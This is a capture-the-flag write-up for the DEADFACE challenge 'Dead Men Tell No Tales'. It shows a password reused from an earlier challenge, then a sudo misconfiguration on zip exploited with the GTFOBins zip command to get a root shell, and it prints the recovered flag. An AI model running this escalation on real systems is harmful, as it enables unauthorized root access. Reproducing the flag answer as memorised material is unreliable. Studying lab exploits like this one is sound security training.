Dead Men Tell No Tales

Challenge:

We've discovered a remote system used by DEADFACE. We're not sure what the password is, but we know Donnell Aulner has an account on that machine. We believe DEADFACE has stored valuable information on this machine. The flag exists on the machine in the format flag{some-text-here}. Submit the flag as flag{flag-goes-here}.

Username: dracula deadmen.deadface.io:22

Solution:

The challenge description didn't include a password for dracula, but we remembered that we recovered it during the Behind the Curtain as, L3t_m3_in. Once logged into the machine we took a look around but didn't find any immediate files of interest. We then looked for privilege escalation opportunities and observed that dracula had sudo rights to execute zip:

$ sudo -l
...
User dracula may run the following commands
    (ALL) NOPASSWD: /usr/bin/zip

We leveraged an escalation technique from GTFOBins to gain root privileges:

$ TF=$(mktemp -u)
$ sudo zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 34%)
# whoami
root

Finally, we took a "shotgun" approach by running a filesystem-wide search for the string flag{, which discovered the flag.

# cd /
# grep -rF "flag{" *

home/spookyboi/.bash_history:echo "flag{c4c089cdbe222b9360880a07c987b581c6f51609}" > flag.txt